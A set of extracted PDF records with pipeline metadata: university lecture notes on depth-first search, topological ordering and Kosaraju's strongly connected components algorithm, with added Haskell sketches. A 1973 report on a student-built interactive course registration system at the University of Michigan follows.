{"Source-Url": "http://www1.cs.columbia.edu/~sedwards/classes/2019/4995-fall/recursion.pdf", "len_cl100k_base": 6417, "olmocr-version": "0.1.49", "pdf-total-pages": 35, "total-fallback-pages": 0, "total-input-tokens": 56296, "total-output-tokens": 8262, "length": "2e12", "weborganizer": {"__label__adult": 0.00035071372985839844, "__label__art_design": 0.0004000663757324219, "__label__crime_law": 0.00025081634521484375, "__label__education_jobs": 0.0006875991821289062, "__label__entertainment": 0.00010704994201660156, "__label__fashion_beauty": 0.00012564659118652344, "__label__finance_business": 9.79304313659668e-05, "__label__food_dining": 0.0005593299865722656, "__label__games": 0.0006704330444335938, "__label__hardware": 0.0006427764892578125, "__label__health": 0.00037741661071777344, "__label__history": 0.0002205371856689453, "__label__home_hobbies": 0.00010508298873901369, "__label__industrial": 0.000324249267578125, "__label__literature": 0.0003578662872314453, "__label__politics": 0.00023877620697021484, "__label__religion": 0.000484466552734375, "__label__science_tech": 0.01152801513671875, "__label__social_life": 0.00012093782424926758, "__label__software": 0.004436492919921875, "__label__software_dev": 0.97705078125, "__label__sports_fitness": 0.0002980232238769531, "__label__transportation": 0.0004086494445800781, "__label__travel": 0.00019741058349609375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 17444, 0.06644]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 17444, 0.66875]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 17444, 0.70182]], "google_gemma-3-12b-it_contains_pii": [[0, 89, false], [89, 672, null], [672, 1128, null], [1128, 1604, null], [1604, 2267, null], [2267, 2641, null], [2641, 3085, null], [3085, 3515, null], [3515, 3961, null], [3961, 4376, null], [4376, 4987, null], [4987, 5413, null], [5413, 5881, null], [5881, 6415, null], [6415, 6726, null], [6726, 7354, null], [7354, 7765, null], [7765, 8223, null], [8223, 8714, null], [8714, 9237, null], [9237, 9843, null], [9843, 10773, null], [10773, 11190, null], [11190, 12034, null], [12034, 12611, null], [12611, 13241, null], [13241, 13770, null], [13770, 13865, null], [13865, 14359, null], [14359, 15071, null], [15071, 15536, null], [15536, 15806, null], [15806, 16503, null], [16503, 16914, null], [16914, 17444, null]], "google_gemma-3-12b-it_is_public_document": [[0, 89, true], [89, 672, null], [672, 1128, null], [1128, 1604, null], [1604, 2267, null], [2267, 2641, null], [2641, 3085, null], [3085, 3515, null], [3515, 3961, null], [3961, 4376, null], [4376, 4987, null], [4987, 5413, null], [5413, 5881, null], [5881, 6415, null], [6415, 6726, null], [6726, 7354, null], [7354, 7765, null], [7765, 8223, null], [8223, 8714, null], [8714, 9237, null], [9237, 9843, null], [9843, 10773, null], [10773, 11190, null], [11190, 12034, null], [12034, 12611, null], [12611, 13241, null], [13241, 13770, null], [13770, 13865, null], [13865, 14359, null], [14359, 15071, null], [15071, 15536, null], [15536, 15806, null], [15806, 16503, null], [16503, 16914, null], [16914, 17444, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 17444, null]], 
"google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 17444, null]], "pdf_page_numbers": [[0, 89, 1], [89, 672, 2], [672, 1128, 3], [1128, 1604, 4], [1604, 2267, 5], [2267, 2641, 6], [2641, 3085, 7], [3085, 3515, 8], [3515, 3961, 9], [3961, 4376, 10], [4376, 4987, 11], [4987, 5413, 12], [5413, 5881, 13], [5881, 6415, 14], [6415, 6726, 15], [6726, 7354, 16], [7354, 7765, 17], [7765, 8223, 18], [8223, 8714, 19], [8714, 9237, 20], [9237, 9843, 21], [9843, 10773, 22], [10773, 11190, 23], [11190, 12034, 24], [12034, 12611, 25], [12611, 13241, 26], [13241, 13770, 27], [13770, 13865, 28], [13865, 14359, 29], [14359, 15071, 30], [15071, 15536, 31], [15536, 15806, 32], [15806, 16503, 33], [16503, 16914, 34], [16914, 17444, 35]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 17444, 0.0]]}
olmocr_science_pdfs
2024-11-26
2024-11-26
1a5b1b3962eeb67c27a1ae9b52920102f777b720
Today’s specials:
- A reminder of the depth-first search (DFS) algorithm and its properties.
- Arranging the nodes of a DAG so that edges go from left to right.
- An algorithm for finding strongly connected components in a digraph.

1 Introduction

Depth First Search: you’ve seen this before, in 15-210, if not even earlier. Given a graph, it is a procedure that visits all the vertices of a graph. And you can build on this in many ways, to give algorithms to:

- Determine the connected components of a graph.
- (*) Find cycles in a directed or undirected graph.
- Find the biconnected components of an undirected graph.
- (*) Topologically sort a directed graph.
- Determine if a graph is planar, and find an embedding of it if it is.
- (*) Find the strong components of a directed graph.

If the graph has \( n \) vertices and \( m \) edges then depth first search can be used to solve all of these problems in time \( O(n + m) \), that is, linear in the size of the graph. In this lecture we will do the final item on this list: find strong components of the graph\(^1\) – though along the way we’ll touch upon the other starred topics while reviewing some basic properties of DFS.

\(^1\)Strong components are directed analogs of connected components; we’ll define them later in this lecture.

2 Depth First Search

First, some notation. We have a directed or undirected graph \( G = (V, E) \). We assume \( n \) nodes/vertices and \( m \) edges. If it is directed, we refer to the edges as arcs to emphasize they are ordered. We write an arc as \((u, v)\) or just \( uv \) — the arrow goes from \( u \) to \( v \). Node \( u \) is the tail of the arc \( uv \) and \( v \) the head. The input will be assumed to be in the adjacency-list format, where the adjacency lists are linked lists. (We won’t need the linked list structure in this lecture.) Let \( \text{adj}(v) \) denote the adjacency list of vertex \( v \) — for directed graphs we assume it contains all the edges going out of \( v \).

OK. DFS. Depth First Search. The simplest graph algorithm in the book, but it has a lot of power to it. In this lecture, we’ll only consider directed graphs; the version for undirected graphs is almost identical.

    Initialize: for each \( v \) in \( V \)
        mark\((v)\) = F

    DFS\((v)\)        // Invariant: \( v \) has not been marked
        mark\((v)\) = T
        for each arc \((vw)\) in adjacency-list\((v)\) {
            if mark\((w)\) == F then DFS\((w)\)
        }

Basically, we look at each arc and if the other side has not been visited yet, we recursively visit it. Here’s an example. The labeled nodes are the ones visited by calling DFS\((A)\). The dashed edges are the ones not traversed, the dotted ones were not even looked at.

A node \( w \) is reachable from \( v \) in \( G \) if there is a path \( v = v_0, v_1, v_2, \ldots, v_k = w \) such that each \((v_i, v_{i+1})\) is an arc of \( G \).

**Fact 1** When DFS\((v)\) terminates, it has visited (marked) all the nodes that can be reached from \( v \).

**Proof:** The simple proof is by induction. We will terminate because every call to DFS\((v)\) is to an unmarked node, and each such call marks a node. There are \( n \) nodes, hence at most \( n \) calls, before we stop. Now suppose some node \( w \) that is reachable from \( v \) is not marked when DFS\((v)\) terminates. Since \( w \) is reachable, there is a path \( v = v_0, v_1, v_2, \ldots, v_k = w \) from \( v \) to \( w \), and a first node \( v_i \) on this path that is not marked.
But this is impossible, because we marked \(v_{i-1}\) and would have examined the arc \((v_{i-1}, v_i)\).

Of course, it may be the case that not all the nodes in \(G\) are reachable from \(v\). So really we should do the following:

    DFS-graph(graph \( G \))
        for all \( v \) in \( V \), mark\((v)\) = F
        while there exists an unmarked node \( v \)
            DFS\((v)\)

This process will visit all the nodes of the graph (just by the definition of the procedure). Here’s the old example.

It will help to have a few more pieces of data defined, which will make reasoning about DFS much easier. One is active\((v)\), which is a flag that indicates that \(v\) is currently on the recursion stack. Two other numbers are pre\((v)\) and post\((v)\), which are “times” at which we add \(v\) to the recursion stack, and when we remove \(v\) from it. (In 15-210, these were the times at which you ENTER \(v\) and EXIT \(v\).) Here is the depth first search procedure:

    for all \( x \in V \) do
        pre\((x)\) ← 0, post\((x)\) ← 0, active\((x)\) ← 0
    i ← 0
    for all \( x \in V \) do
        if pre\((x)\) = 0 then DFS\((x)\)

    DFS\((v)\)
        i ← i + 1
        pre\((v)\) ← i
        active\((v)\) ← 1
        for all \( w \in \text{adj}(v) \) do
            if pre\((w)\) = 0 then DFS\((w)\)        // \( vw \) is a tree arc
            else if pre\((w)\) > pre\((v)\) then ...  // \( vw \) is a forward arc
            else if active\((w)\) = 0 then ...        // \( vw \) is a cross arc
            else ...                                  // \( vw \) is a back arc
        active\((v)\) ← 0
        i ← i + 1
        post\((v)\) ← i
    end DFS

Below is our running example with the node labelings and the arc classification: the solid arcs are tree arcs, dashed arcs are forward arcs, the dotted arcs are cross arcs, and the dot-dashed arcs are back-arcs.

Just as above, this process examines all arcs and vertices. The call DFS\((v)\) is made exactly once for each vertex of the graph. Each arc is placed into exactly one of four classes by the algorithm: tree arcs, forward arcs, cross arcs, and back arcs. This classification of the arcs is not a property of the graph alone. It also depends on the ordering of the vertices in \( \text{adj}(v) \) and on the ordering of the vertices in the loop that calls the DFS procedure.

The tree arcs have the property that either zero or one of them points to a given vertex. Therefore, they define a collection of trees, called the depth-first spanning forest of the graph. The root of each tree is the vertex with the lowest \( \text{pre} \) number (the one that was searched first). These rooted trees allow us to define the ancestor and descendant relations among vertices. The four types of arcs are related to the spanning forest as follows:

- The forward arcs are arcs from a vertex to a descendant of it that are not tree arcs. This is because the test pre\((w)\) > pre\((v)\) indicates that \( w \) was explored after the call to DFS\((v)\). Since the call to DFS\((v)\) is not yet complete, \( w \) must be a descendant of \( v \). Moreover, the exploration of \( w \) must be complete (it must have been popped from the execution stack for us to return to \( v \)), so we’ll have post\((w)\) < post\((v)\). To summarize, forward arcs have pre\((v)\) < pre\((w)\) < post\((w)\) < post\((v)\). This pattern is also true for tree arcs.

- The cross arcs are arcs from a vertex \( v \) to a vertex \( w \) such that the subtrees rooted at \( v \) and \( w \) are disjoint.
This follows because active\((w)\) = 0, so the exploration of \( w \) is complete, and was complete before the call to DFS\((v)\); so we’ll have post\((w)\) < pre\((v)\) < post\((v)\). Therefore \( v \) is not in a subtree rooted at \( w \). Vertex \( w \) is not in a subtree rooted at \( v \) because pre\((w)\) < pre\((v)\). To summarize, for cross arcs \( vw \):
\[ \text{pre}(w) < \text{post}(w) < \text{pre}(v) < \text{post}(v) \]

- The back arcs are arcs from a vertex to an ancestor of it. The fact that active\((w)\) = 1 indicates that \( w \) is on the recursion stack and is thus an ancestor of \( v \). So for back arcs, we’ll have
\[ \text{pre}(w) < \text{pre}(v) < \text{post}(v) < \text{post}(w). \]

Observe from this discussion that just by looking at the pre/post numbers for two vertices \( x \) and \( y \), we can correctly answer the question: **Is \( x \) an ancestor of \( y \) in the DFS tree? Or is \( y \) an ancestor of \( x \)? Or are they unrelated?**

**Exercise:** A tree \( T \) rooted at some node \( r \) naturally defines an ancestor-descendant relation on the nodes. Show that you can label each node with labels of size \( O(\log n) \) bits so that you can answer queries of the form “is \( x \) an ancestor of \( y \) in \( T \), or is \( y \) an ancestor of \( x \), or are they unrelated?” in constant time. (Assume comparing \( O(\log n) \)-bit integers takes constant time.)

3 Topological Ordering for Directed Acyclic Graphs

You know what a directed acyclic graph (DAG) is, right? A directed graph that does not have any directed cycles. I.e., no directed path that starts at \( v \) and ends at \( v \), except of course the path of length 0. No “non-trivial” path. Below’s a DAG and its DFS.

**Lemma 2** A digraph \( G \) is a DAG if and only if DFS on the graph has no back arcs.

**Proof:** One direction is immediate: if there is a back arc (which goes from a descendant to an ancestor), it creates a cycle. On the other hand, if there is a cycle \( C \) in \( G \), consider the earliest node in \( C \) visited by DFS (the one with the lowest \( \text{pre} \) number). Call it \( v \). Since all nodes in \( C \) are reachable from \( v \), they will be visited before time post\((v)\), and will be descendants of \( v \). But then \( v \)'s predecessor \( u \) on the cycle would have resulted in the back arc \( uv \).

Look back at the classification of arcs into tree/forward, back, and cross. In a DAG there are no back arcs. This means all the arcs \( vw \) in the graph have the property that post\((w)\) < post\((v)\). In words, the head of each arc has a smaller post number than the tail. So here’s a way to output a total ordering of the vertices in \( G \), so that all arcs in \( G \) go from left to right:

*Run DFS on \( G \). Output the vertices in decreasing order of their post numbering.*

For example, the DAG above will result in the following ordering.

Exercise: Naively, the above algorithm asks us to sort the post numbers, which would take \( O(n \log n) \) time. Show that the algorithm can be implemented in \( O(m + n) \) time by slightly altering the DFS procedure.

Exercise: Now suppose you forgot to alter the DFS procedure. You ran DFS, got the post numbers, and now you read the second line. You don’t want to spend \( O(n \log n) \) time to sort the \( n \) post numbers. How can you sort them in \( O(n) \) time?
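As a concrete sketch of this recipe (my own code, not part of the notes; written in Haskell for brevity), run DFS over the whole graph, emit each vertex as it finishes, and read the finish order backwards. The Map/Set bookkeeping used here costs an extra log factor over the \( O(m + n) \) bound discussed above.

```haskell
import qualified Data.Map.Strict as M
import qualified Data.Set as S

type Graph = M.Map Int [Int]          -- every vertex appears as a key

-- Vertices in decreasing post-number order: a topological order when the graph is a DAG.
topoOrder :: Graph -> [Int]
topoOrder g = snd (foldl (\st v -> dfs v st) (S.empty, []) (M.keys g))
  where
    dfs v st@(seen, out)
      | v `S.member` seen = st
      | otherwise =
          let (seen', out') =
                foldl (flip dfs) (S.insert v seen, out) (M.findWithDefault [] v g)
          in (seen', v : out')        -- v finishes only after everything it reaches

-- topoOrder (M.fromList [(1,[2,3]), (2,[4]), (3,[4]), (4,[])])  gives  [1,3,2,4]
```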
Such an ordering on the nodes, where all the arcs point in the same direction (say from left to right), is called a topological ordering. We’ve just shown that the graphs for which a topological ordering exists are precisely the DAGs. And the exercise shows we can output a topological ordering in \( O(m + n) \) time.

Exercise: A source in a digraph is a node that has no arcs coming into it. A sink is a node that has no arcs leaving it. Prove that each DAG must have at least one source and at least one sink. Show a digraph (that is not a DAG) that has no sources and no sinks.

Exercise: Prove that the following algorithm also outputs a topological ordering: Find a sink \( v \) in the current DAG. Recursively output an ordering on \( G - v \) (the graph with \( v \) deleted). Output \( v \) at the end.

Exercise: Prove that the following algorithm also outputs a topological ordering: Find a source \( v \) in the current DAG. Output \( v \). Recursively output an ordering on \( G - v \) (the graph with \( v \) deleted).

Exercise: Can you implement the algorithms outlined in the above exercises in \( O(m + n) \) time?

4 Strongly Connected Components

Call two vertices \( v \) and \( w \) equivalent, denoted \( v \equiv w \), if there exists a path from \( v \) to \( w \) and one from \( w \) to \( v \). The relation “\( \equiv \)” so defined is an equivalence relation because it satisfies the following three properties:

1. Reflexivity: \( w \equiv w \). This is because a path of length zero goes from \( w \) to \( w \) and vice versa.
2. Symmetry: If \( v \equiv w \) then \( w \equiv v \). This follows immediately from the definition.
3. Transitivity: If \( v \equiv w \) and \( w \equiv x \) then \( v \equiv x \). If there is a path from \( v \) to \( w \), and one from \( w \) to \( x \), then there is a path from \( v \) to \( x \). The same reasoning shows that there is a path from \( x \) to \( v \).

This equivalence relation induces a partitioning of the vertices of the graph into components in which each pair of vertices in a component are equivalent. These are called the strongly connected components or strong components of the graph. It is standard to abbreviate this as SCCs.

On the left is an example of a directed graph partitioned into its SCCs. Then if we contract the SCCs into single nodes, we get the graph on the right, which you notice is a DAG with one source and two sinks. This DAG structure is not a fluke, as we show next.

**Fact 3** Shrinking each SCC of a graph \( G \) into a single node gives us a DAG.

**Proof:** (Sketch) If there were a cycle in the shrunk graph containing the nodes corresponding to SCCs \( S_1 \) and \( S_2 \), then we could reach from some node in \( S_1 \) to some node in \( S_2 \) (and vice versa). And hence we could reach from all nodes in \( S_1 \) to all nodes in \( S_2 \) and vice versa. So \( S_1 \) and \( S_2 \) should have been in the same SCC to begin with.

Our goal is to devise an algorithm which will compute the SCCs of a graph. There is a very close relationship between the strong components of a graph and the depth first spanning forest of the graph. We shall present an algorithm that uses depth first search to find the strong components of the graph.

Here’s the idea behind our algorithm (called Kosaraju’s algorithm). There’s this DAG of SCCs of \( G \). Suppose we knew a vertex \( v \) in a sink SCC. If we run DFS from \( v \), we would see exactly the nodes in that sink SCC. We could then delete these nodes. This would leave a smaller graph \( G' \) with the same set of SCCs as \( G \) (except the one we just deleted). We repeat — find a vertex \( v' \) in a sink SCC in \( G' \), use DFS to find the entire sink SCC, delete it and keep going.
A nice and clean idea. A few things to worry about. (a) How do we find a node in this sink SCC? (b) How to find this in linear time? (c) And then, how to run the entire algorithm in linear time? OK, one thing at a time.

4.1 Finding a Node in the Sink SCC

The crucial idea here is the following observation.

**Lemma 4** In a run of DFS on digraph \( G \), the vertex with the highest post number belongs to a source SCC.

Here are two different DFS runs on the same graph with the highest post number in the source component.

---
\(^2\)Kosaraju’s algorithm is due to S. Rao Kosaraju. There’s no paper associated with it, though — it just appears in the classic textbook of Aho, Hopcroft, and Ullman, attributed to him.
\(^3\)Why? Clearly we’d see at least the nodes in the same SCC as \( v \). The worry is that we might see more — nodes which are reachable from \( v \) but can’t reach \( v \). That is, we might see nodes that lie in a different SCC. This is why we chose \( v \) from a sink SCC. There are no other SCCs reachable from \( v \)'s SCC. So we’ll see exactly the nodes in \( v \)'s SCC.

Oh, that sounds goo ... Wait, what? The source SCC? Didn’t we want the sink SCC? For our scheme the source SCC won’t do at all. The whole point was that starting DFS from a node in a sink SCC will explore exactly that SCC (which we can peel off and repeat). Starting it from a source SCC might explore a lot more.

This is actually easy to fix. Look at the inverted digraph \( G^\leftarrow \), which is obtained by just reversing the directions of all arcs in \( G \). A sink SCC in \( G \) is then a source SCC in the inverted graph \( G^\leftarrow \). This trick allows us to find a sink SCC in \( G \).

So back to proving Lemma 4. The proof is immediate once you’ve proved the following claim.

**Claim 5** If \( C_1 \) and \( C_2 \) are SCCs in \( G \) with an edge from some node in \( C_1 \) to some node in \( C_2 \), then the highest post number in \( C_1 \) is greater than the highest post number in \( C_2 \).

**Proof:** Look at the first node in \( C_1 \cup C_2 \) that DFS visits. Say it is node \( v_1 \in C_1 \); then \( v_1 \) will have the highest post number among all these nodes. Else we visit some \( v_2 \in C_2 \) before any of the nodes in \( C_1 \) — then DFS will visit all nodes in \( C_2 \) before it exits \( v_2 \), and none in \( C_1 \) (because none of the nodes in \( C_1 \) are reachable from \( v_2 \)). In this latter case even all the pre numbers of \( C_1 \) will be later than all the post numbers of \( C_2 \). ■

Good, good. So this says that a single DFS suffices to find a node in a source component of \( G \). And the inverted digraph idea tells us that we can use this to find some node in a sink component \( C_s \) of \( G \). You remember the inverted digraph idea, right? We took the inverted digraph \( G^\leftarrow \) and ran DFS on it to get the post numbers on the nodes. For each \( v \in V \), let’s denote post\((v)\) on this inverted graph by \( \text{post}_{G^\leftarrow}(v) \). Look at the vertex in \( G \) with the highest value of \( \text{post}_{G^\leftarrow}(v) \); call this \( v_s \). Call the associated sink SCC \( C_s \). Now run DFS\((v_s)\) — this will get stuck precisely after exploring \( C_s \), and this DFS will just take time proportional to the number of arcs and nodes within \( C_s \).

4.2 Finishing the Rest in Linear Time Too

OK, so one SCC down, all the rest to go. And what about the rest? Well, the final piece of the puzzle is also simple.
Let \( G' \) be the graph obtained by deleting the nodes and arcs of \( C_s \) from the graph \( G \). The vertex with the highest \( \text{post}_{G^\leftarrow}(v) \) number among those remaining in \( G' \) will be in a sink SCC of \( G' \). (You see why? It again follows from Claim 5.) We can now peel off this component, and repeat. The time to peel off each SCC is proportional to the number of arcs within the SCC. Adding over all the SCCs, the total time is again \( O(m+n) \).

The algorithm is now easily summarized.

*Compute the post numbers in the graph \( G^\leftarrow \); call the numbers \( \text{post}_{G^\leftarrow}(\cdot) \).*
*Initialize \( H \leftarrow G \).*
*Repeat until \( H \) is empty:*
  *Let \( v \) be the vertex in \( H \) with the highest \( \text{post}_{G^\leftarrow}(\cdot) \) value.*
  *Run DFS\((v)\) in \( H \) to find the associated sink SCC \( C \), and delete it from \( H \).*

Again, the first step is just DFS, and each step of the loop can be charged to the nodes and edges of the component removed from \( H \) in that iteration. Short and simple. And it’s all achieved just by using the simple properties of the DFS algorithm and numbering scheme.

**Exercise:** Note that when we are running DFS, we have the flexibility of choosing the start node (and also, every time DFS stops before it explores the entire graph, choosing the next node to begin DFS at). Use this observation to implement the above algorithm using 2 DFSs.
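To make the two-pass idea concrete, here is a compact sketch (my own code, not from the notes; Haskell again, with the same Map/Set representation as the earlier topological-order sketch, so it runs in \( O((m+n)\log n) \) rather than strictly linear time):

```haskell
import qualified Data.Map.Strict as M
import qualified Data.Set as S

type Graph = M.Map Int [Int]          -- every vertex appears as a key

-- Pass 1: DFS the reversed graph and list vertices in decreasing post order.
-- Pass 2: DFS the original graph in that order; every restart peels off one sink SCC.
sccs :: Graph -> [[Int]]
sccs g = peel S.empty (postOrder (rev g))
  where
    peel _    []     = []
    peel seen (v:vs)
      | v `S.member` seen = peel seen vs
      | otherwise         = let (seen', comp) = collect v (seen, [])
                            in comp : peel seen' vs
    collect v st@(seen, comp)          -- gather v's still-unseen reachable set in g
      | v `S.member` seen = st
      | otherwise         = foldl (flip collect)
                                  (S.insert v seen, v : comp)
                                  (M.findWithDefault [] v g)

-- Vertices in decreasing post-number order of a DFS over the whole graph.
postOrder :: Graph -> [Int]
postOrder g = snd (foldl (\st v -> dfs v st) (S.empty, []) (M.keys g))
  where
    dfs v st@(seen, out)
      | v `S.member` seen = st
      | otherwise =
          let (seen', out') =
                foldl (flip dfs) (S.insert v seen, out) (M.findWithDefault [] v g)
          in (seen', v : out')

-- Reverse every arc (the inverted digraph G←).
rev :: Graph -> Graph
rev g = M.fromListWith (++) ([ (w, [v]) | (v, ws) <- M.toList g, w <- ws ]
                             ++ [ (v, []) | v <- M.keys g ])
```

For the digraph with arcs 1→2, 2→1, 2→3 this returns [[3],[2,1]]: the sink component {3} is peeled off first, exactly as in the peeling argument above.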
{"Source-Url": "http://www.cs.cmu.edu/afs/cs.cmu.edu/user/avrim/www/451f13/lectures/lect0919.pdf", "len_cl100k_base": 5173, "olmocr-version": "0.1.50", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 26461, "total-output-tokens": 5796, "length": "2e12", "weborganizer": {"__label__adult": 0.00045013427734375, "__label__art_design": 0.0005054473876953125, "__label__crime_law": 0.0005345344543457031, "__label__education_jobs": 0.0032806396484375, "__label__entertainment": 0.00015032291412353516, "__label__fashion_beauty": 0.00023448467254638672, "__label__finance_business": 0.0003325939178466797, "__label__food_dining": 0.0006198883056640625, "__label__games": 0.001598358154296875, "__label__hardware": 0.0017938613891601562, "__label__health": 0.0011339187622070312, "__label__history": 0.0006213188171386719, "__label__home_hobbies": 0.00031828880310058594, "__label__industrial": 0.00093841552734375, "__label__literature": 0.0005488395690917969, "__label__politics": 0.0004062652587890625, "__label__religion": 0.0009360313415527344, "__label__science_tech": 0.23681640625, "__label__social_life": 0.0002014636993408203, "__label__software": 0.00824737548828125, "__label__software_dev": 0.73828125, "__label__sports_fitness": 0.0006718635559082031, "__label__transportation": 0.001148223876953125, "__label__travel": 0.0003843307495117187}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 18881, 0.00626]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 18881, 0.54444]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 18881, 0.90929]], "google_gemma-3-12b-it_contains_pii": [[0, 2362, false], [2362, 4421, null], [4421, 6794, null], [6794, 9963, null], [9963, 12758, null], [12758, 15039, null], [15039, 18134, null], [18134, 18881, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2362, true], [2362, 4421, null], [4421, 6794, null], [6794, 9963, null], [9963, 12758, null], [12758, 15039, null], [15039, 18134, null], [18134, 18881, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 18881, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 18881, null]], "pdf_page_numbers": [[0, 2362, 1], [2362, 4421, 2], [4421, 6794, 3], [6794, 9963, 4], [9963, 12758, 5], [12758, 15039, 6], [15039, 18134, 7], [18134, 18881, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 18881, 0.0]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
25c15415d90097be9a917f879f8602010b8988f6
A class project in a systems programming course at the University of Michigan sought to produce a system realistic enough to warrant production use, the underlying assumption being that the reality of the project would motivate students and provide them with valuable experience. Eighteen experienced students in the Computerized Registration Involving Student Participation (CRISP) project worked with the Michigan Terminal System to produce an on-line course registration system for students which would interface with those main parts of the current system dealing with room scheduling, transcript production, etc. Interfaces with the current Data Systems Center were ordered, student groups with individual functions were organized, and internal and external specifications stipulated. The student-designed system was successfully demonstrated, resulting in support from the central university administration for further development and eventual implementation of the system. The conclusion was therefore reached that a class project could produce a realistic system, 1) provided that good tools are available, particularly a general-purpose time-sharing system, and 2) that continual guidance on the interface with the system's eventual environment is maintained. (PB) CRISP: An Interactive Student Registration System B.A. Galler, R. Wagman, J. Bravatto, G. Lift, G. Kern, V. Berstis, and E. Munn The University of Michigan, Ann Arbor, Michigan January 24, 1973 Index Terms Interactive, On-Line, Programming, Systems Programming, Student, Administrative System Abstract A class project, even for an advanced class in systems programming, is usually simplified to make it possible to achieve success. A conflicting goal is to produce a realistic enough system to warrant production use, so as to provide the class with sufficient motivation and the right kind of system experience. The problem is compounded when the resulting system is to be a component in an on-going information-processing system and must be compatible with it— with existing documents and procedures, with unstated assumptions about the data and about the current algorithms used to process the data, and with the social and institutional traditions that surround it. This paper reports on one successful class project of this kind. CRISP: An Interactive Student Registration System B. A. Galler, R. Wagman, J. Bravatto, G. Lift, G. Kern, V. Berstis, and E. Munn Introduction In 1971, Arden, Flanigan, and Galler [1] reported on a systems programming class based on a group project in some area of systems. Clearly, with 15-20 students, over a period of a semester, one can undertake a project of some magnitude, but when one considers the need for specifying the system to be produced, and the programming and debugging time involved, there is always pressure to simplify the system goals. After all, one of the desired outcomes is the successful completion of the project, after facing up to the many difficulties involved. On the other hand, if the students were to become convinced that the exercise is "purely academic," there is a problem in motivation and dedication. Students are always involved in a number of other activities besides the particular course in which the professor is so involved, and if their morale and dedication is weakened, the system project will be endangered. 
The difficulty, therefore, is to find a problem that is challenging, educational, and feasible, while at the same time realistic, and with enough promise of generating a production system to motivate the students to put a great deal of time and effort into it. It is also important, of course, to choose very good students with sufficient programming background that they can plunge directly into the problem with a minimum of introductory material, and to provide them with good tools. In this case, the 18 students (primarily graduate students) were all quite good programmers, some with one or more years of experience on campus research projects, and they had available to them the facilities of the Michigan Terminal System (MTS), an excellent, general-purpose time-sharing system [2]. The Problem During the months preceding the course, the university administration had been considering the adoption of an alternative to the current system of assigning students to classes. On a campus in which administrative and academic decision-making is highly decentralized, the system currently in use reflects the historical pattern of growth in which small changes are superimposed on each other in response to demands from many different sources. Changes are difficult to implement, and their consequences difficult to predict. Although the administrative Data Systems Center (DSC) is moving rapidly toward efficient on-line access, this was not yet being considered as a viable alternative for the student registration problem. This, then, was an excellent problem for the class; viz, produce an on-line "reservation system" for students, which would interface with the main part of the current system; e.g., the part concerned with room scheduling, transcript producing, time schedule printing, etc., and which would be capable of handling the volume presented by 35,000 students taking courses in any or all of the Fall, Winter, and Spring-Summer terms, and the Spring and Summer half-terms. Moreover, the current lines of students waiting to register should disappear, and the whole thing should cost relatively little to run! Finally, while the class-generated part of the system would be developed to run under MTS, it would have to be planned so that eventually it could be moved to the DSC computer. The Interfaces One immediate problem was the specification of the interface with the current system. Since neither the professor nor any of the students who could be expected to enroll would be very familiar with the current system at DSC, representatives from DSC were solicited to join the class as observers. They would advise on the current system's organization and insure compatibility at the interface. (One very competent person from DSC subsequently enrolled in the course, proving invaluable for these interface requirements.) One of the authors of this paper joined the class as a "participating observer" (no casual observers were allowed, because of group morale considerations), and provided very welcome and useful insights into the counseling interface that the system would have. One additional interface was underrepresented; e.g., the Office of the Registrar, where many of the policy decisions were being made, and while the difficulties thus introduced have now been largely overcome, it points up a danger in such an undertaking. 
